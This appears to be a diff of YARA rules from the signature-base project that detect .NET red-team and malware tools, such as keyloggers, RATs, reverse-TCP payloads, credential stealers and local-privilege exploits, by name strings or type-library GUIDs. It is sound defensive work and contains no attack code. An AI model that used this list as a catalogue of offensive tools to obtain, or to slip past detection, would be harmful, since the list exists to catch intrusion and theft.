+		logic_hash = "211a96940c5cbca143471268500be46c13dc58469d2386b2dc7f8ff1f05a2c52"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "AggressiveProxy" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "2a3c5921-7442-42c3-8cb9-24f21d0b2414" ascii wide
+		$typelibguid0up = "2A3C5921-7442-42C3-8CB9-24F21D0B2414" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Msbuildapicaller : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Random_Csharptools : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "143da57f-b01f-5688-b741-1bc4d06cd7d1"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/rvrsh3ll/MSBuildAPICaller"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L421-L434"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ad8b5573-ad20-50cd-927b-a6401b10e653"
+		date = "2020-12-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/xorrior/Random-CSharpTools"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2781-L2807"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3c1f33c759e6331c562dbf76ce7e34ee82d10070e331d0967143d9d7fad077fc"
+		logic_hash = "d1d5e372c6e1314ebf317b51633b83b2f9336048cc223982052e078ca86ee6bc"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "MSBuildAPICaller" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "f7fc19da-67a3-437d-b3b0-2a257f77a00b" ascii wide
+		$typelibguid0up = "F7FC19DA-67A3-437D-B3B0-2A257F77A00B" ascii wide
+		$typelibguid1lo = "47e85bb6-9138-4374-8092-0aeb301fe64b" ascii wide
+		$typelibguid1up = "47E85BB6-9138-4374-8092-0AEB301FE64B" ascii wide
+		$typelibguid2lo = "c7d854d8-4e3a-43a6-872f-e0710e5943f7" ascii wide
+		$typelibguid2up = "C7D854D8-4E3A-43A6-872F-E0710E5943F7" ascii wide
+		$typelibguid3lo = "d6685430-8d8d-4e2e-b202-de14efa25211" ascii wide
+		$typelibguid3up = "D6685430-8D8D-4E2E-B202-DE14EFA25211" ascii wide
+		$typelibguid4lo = "1df925fc-9a89-4170-b763-1c735430b7d0" ascii wide
+		$typelibguid4up = "1DF925FC-9A89-4170-B763-1C735430B7D0" ascii wide
+		$typelibguid5lo = "817cc61b-8471-4c1e-b5d6-c754fc550a03" ascii wide
+		$typelibguid5up = "817CC61B-8471-4C1E-B5D6-C754FC550A03" ascii wide
+		$typelibguid6lo = "60116613-c74e-41b9-b80e-35e02f25891e" ascii wide
+		$typelibguid6up = "60116613-C74E-41B9-B80E-35E02F25891E" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Graykeylogger : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2020_0668 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "c63875b6-1701-5594-927e-833c25dc5d98"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/DarkSecDevelopers/GrayKeylogger"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L436-L449"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "54c87578-f0f1-5108-a736-b6acd9624d29"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/RedCursorSecurityConsulting/CVE-2020-0668"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2809-L2823"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b8e12c5ddf0d50d0b3681594c8bc3410a24dab00035a5959e20d20045dacbbbd"
+		logic_hash = "b72a5dff34f9674545acccad556204ed65dfdd587aa6a4d1fe542afd91e5a8d5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "GrayKeylogger" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "1b4c5ec1-2845-40fd-a173-62c450f12ea5" ascii wide
+		$typelibguid0up = "1B4C5EC1-2845-40FD-A173-62C450F12EA5" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Weevely3 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Windowsrpcclients : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "6bf766b6-d065-5a84-8258-3be448b9cbb8"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/epinna/weevely3"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L451-L464"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "70fd7431-8c32-52a4-be9f-2a19ef77f2cc"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/tyranid/WindowsRpcClients"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2825-L2851"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c57c6ba5276679a2d32e9b0ebb61059c5bed1ba45f9792ecef3d5c7244f38f24"
+		logic_hash = "a15992e0f24ec7ecec5a42d8996102e60958c441a1926267718531c95c8b7e35"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "weevely3" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "843d8862-42eb-49ee-94e6-bca798dd33ea" ascii wide
+		$typelibguid0up = "843D8862-42EB-49EE-94E6-BCA798DD33EA" ascii wide
+		$typelibguid1lo = "632e4c3b-3013-46fc-bc6e-22828bf629e3" ascii wide
+		$typelibguid1up = "632E4C3B-3013-46FC-BC6E-22828BF629E3" ascii wide
+		$typelibguid2lo = "a2091d2f-6f7e-4118-a203-4cea4bea6bfa" ascii wide
+		$typelibguid2up = "A2091D2F-6F7E-4118-A203-4CEA4BEA6BFA" ascii wide
+		$typelibguid3lo = "950ef8ce-ec92-4e02-b122-0d41d83065b8" ascii wide
+		$typelibguid3up = "950EF8CE-EC92-4E02-B122-0D41D83065B8" ascii wide
+		$typelibguid4lo = "d51301bc-31aa-4475-8944-882ecf80e10d" ascii wide
+		$typelibguid4up = "D51301BC-31AA-4475-8944-882ECF80E10D" ascii wide
+		$typelibguid5lo = "823ff111-4de2-4637-af01-4bdc3ca4cf15" ascii wide
+		$typelibguid5up = "823FF111-4DE2-4637-AF01-4BDC3CA4CF15" ascii wide
+		$typelibguid6lo = "5d28f15e-3bb8-4088-abe0-b517b31d4595" ascii wide
+		$typelibguid6up = "5D28F15E-3BB8-4088-ABE0-B517B31D4595" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Fudgec2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpfruit : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "a8e70bce-76dd-53dc-9a19-1cc6795fdef3"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/Ziconius/FudgeC2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L466-L479"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "bf318530-b17d-5275-84b2-c284528bdae6"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/rvrsh3ll/SharpFruit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2853-L2867"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "89f3bf4b81a901e813c3021422c362d7e075dec7fd76240be121f677039f1994"
+		logic_hash = "3fffebded16430beae82315532548a4c035f4c9e92a893f441b1d5049d97f73a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "FudgeC2" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "3da2f6de-75be-4c9d-8070-08da45e79761" ascii wide
+		$typelibguid0up = "3DA2F6DE-75BE-4C9D-8070-08DA45E79761" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_Reverse_Tcp : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwitness : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "a6b935cc-adb6-5ff4-a832-1043e77292f7"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/DamonMohammadbagher/NativePayload_Reverse_tcp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L481-L494"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5e707da6-b2dd-511e-89ad-d19b93e8fca6"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/rasta-mouse/SharpWitness"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2869-L2883"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "055ee105cd46e54b4f49dd92975ecc08a6184fa8508585ee528d19de34914758"
+		logic_hash = "7339e77168c23cc218892db37fad0a6806b15d57a83b75b5da53c2f5e04b327d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "NativePayload_Reverse_tcp" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "b9f6ec34-4ccc-4247-bcef-c1daab9b4469" ascii wide
+		$typelibguid0up = "B9F6EC34-4CCC-4247-BCEF-C1DAAB9B4469" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Sharphose : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Rexcrypter : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "89b00eb0-f1a2-5c77-a5b0-2329b08aadb7"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/ustayready/SharpHose"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L496-L509"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5ebbeab3-3e93-5544-8f74-3d1b47335d8b"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/syrex1013/RexCrypter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2885-L2899"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e3af2a156c2451f7ed2fe3e888fdf2ae080298f7eff56801ddc0c612f04902ee"
+		logic_hash = "82edeed1b6641c45ab7e41eb0d98416760c3af9998bf391905192d732e658cc1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "SharpHose" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "10cd7c1c-e56d-4b1b-80dc-e4c496c5fec5" ascii wide
+		$typelibguid0up = "10CD7C1C-E56D-4B1B-80DC-E4C496C5FEC5" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_RAT_Njrat_0_7D_Modded_Source_Code : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpersist : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "2b7d1f75-0164-561e-8199-32c601cbca98"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/AliBawazeEer/RAT-NjRat-0.7d-modded-source-code"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L511-L524"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0c181186-7bb4-502b-8937-60cfd88ce689"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/fireeye/SharPersist"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2901-L2915"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f437195348452242adc8b55d6d517a17764c53188fa2de5cd15848fd23827381"
+		logic_hash = "85a96c0fcbbc0ddb2fd0eab77c33976345120e575e5954e35bb4a61ff534b15a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "RAT-NjRat-0.7d-modded-source-code" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "9d1b853e-58f1-4ba5-aefc-5c221ca30e48" ascii wide
+		$typelibguid0up = "9D1B853E-58F1-4BA5-AEFC-5C221CA30E48" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Rdpthief : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2019_1253 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "5ad4feec-50db-5ebb-a609-9196e72a24aa"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/0x09AL/RdpThief"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L526-L539"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3e18b533-1b85-5eaf-bb3d-aa5b90fd2e28"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/padovah4ck/CVE-2019-1253"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2917-L2931"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8e472c8265d517e512eada819627d56ff449fae4d80054946e9ea96f74004f05"
+		logic_hash = "964b3c21297295833a702160fc292dcbb06573e5341b81dfc05b641246c4b019"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "RdpThief" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "584964c1-f983-498d-8370-23e27fdd0399" ascii wide
+		$typelibguid0up = "584964C1-F983-498D-8370-23E27FDD0399" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Runascs : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Scout : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "c5fc5b01-1d30-5af5-be99-e629cb23295b"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/antonioCoco/RunasCs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L541-L554"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "cd24cca7-3bc0-5e7a-9817-dc3b26ec8358"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/jaredhaight/scout"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2933-L2947"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9fd22a3e92222134c101693b944a2ad53055f9cfafe99823fd6f412981f5afa3"
+		logic_hash = "8bd735b4c4c3af209475b633c00fc8f01b2e9a3a5e5e29557a578d87e7bd0836"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "RunasCs" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "d9c76e82-b848-47d4-8f22-99bf22a8ee11" ascii wide
+		$typelibguid0up = "D9C76E82-B848-47D4-8F22-99BF22A8EE11" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_IP6DNS : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Grouper2 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "3b32b408-e71a-5f2a-ae6f-72a3d6572b71"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/DamonMohammadbagher/NativePayload_IP6DNS"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L556-L569"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a9cd9a16-b2a5-5d15-af89-7a8d0f1835bb"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/l0ss/Grouper2/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2949-L2963"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "509c396b97524335735107644460eebed3146b2bc5f8dedb909c9754b2121f5f"
+		logic_hash = "0c1909e40b587d86766ff393cc056352ffaf40f2b56c3a1217b1526cc42e4eb7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "NativePayload_IP6DNS" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "5decaea3-2610-4065-99dc-65b9b4ba6ccd" ascii wide
+		$typelibguid0up = "5DECAEA3-2610-4065-99DC-65B9B4BA6CCD" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_ARP : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Casperstager : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "9fac11f8-4e40-5cbc-a990-2ae48df20828"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/DamonMohammadbagher/NativePayload_ARP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L571-L584"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0ad18d2b-b7cc-5316-a8e8-b05d4439b8e1"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/ustayready/CasperStager"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2965-L2981"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e8cecfe09f1cb80eb693eb293dfb8c1bc3885a96dfa045b2391216c5f6f6f983"
+		logic_hash = "6ac00affab78024da7a1cfa6e6fd43c6a8f3c7fec59499a85c1330ee593488eb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "NativePayload_ARP" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "c653a9f2-0939-43c8-9b93-fed5e2e4c7e6" ascii wide
+		$typelibguid0up = "C653A9F2-0939-43C8-9B93-FED5E2E4C7E6" ascii wide
+		$typelibguid1lo = "48dfc55e-6ae5-4a36-abef-14bc09d7510b" ascii wide
+		$typelibguid1up = "48DFC55E-6AE5-4A36-ABEF-14BC09D7510B" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_C2Bridge : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Tellmeyoursecrets : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "357051aa-61ea-5454-a996-b4e3a45ac865"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/cobbr/C2Bridge"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L586-L599"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b00c353b-0446-5faa-87e5-0a7ba6ec2286"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/0xbadjuju/TellMeYourSecrets"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2983-L2997"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d5f6d6e9d475bf2d8a49d7550bf3b718539753f3494b58462094bfc0a37b813a"
+		logic_hash = "cabb37be30a62ef6055e6b6a8f5cd1b9f51b231d254419a94aedd5ddfb992376"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "C2Bridge" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "9b448062-7219-4d82-9a0a-e784c4b3aa27" ascii wide
+		$typelibguid0up = "9B448062-7219-4D82-9A0A-E784C4B3AA27" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Infrastructure_Assessment : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpexcel4_DCOM : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "efacc12b-92b3-5b22-b5bb-cd5a7d7eea0e"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/NyaMeeEain/Infrastructure-Assessment"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L601-L614"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "12d3f26b-40ca-5034-a7c2-9be9c8a7599b"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/rvrsh3ll/SharpExcel4-DCOM"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2999-L3013"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7b2f1481c2880b5b3ee158f2a526ab7fc5e587bbf3847ebe9ddf447742109a78"
+		logic_hash = "abc87f0ed51f044633ef7854610cd16460eefad570c31c7fe854d245229cceb3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "Infrastructure-Assessment" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "68b83ce5-bbd9-4ee3-b1cc-5e9223fab52b" ascii wide
+		$typelibguid0up = "68B83CE5-BBD9-4EE3-B1CC-5E9223FAB52B" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Shellcodetester : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpshooter : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "964093a4-e6d7-51b7-928a-b1cd40dc11cc"
-		date = "2021-01-22"
-		modified = "2024-12-10"
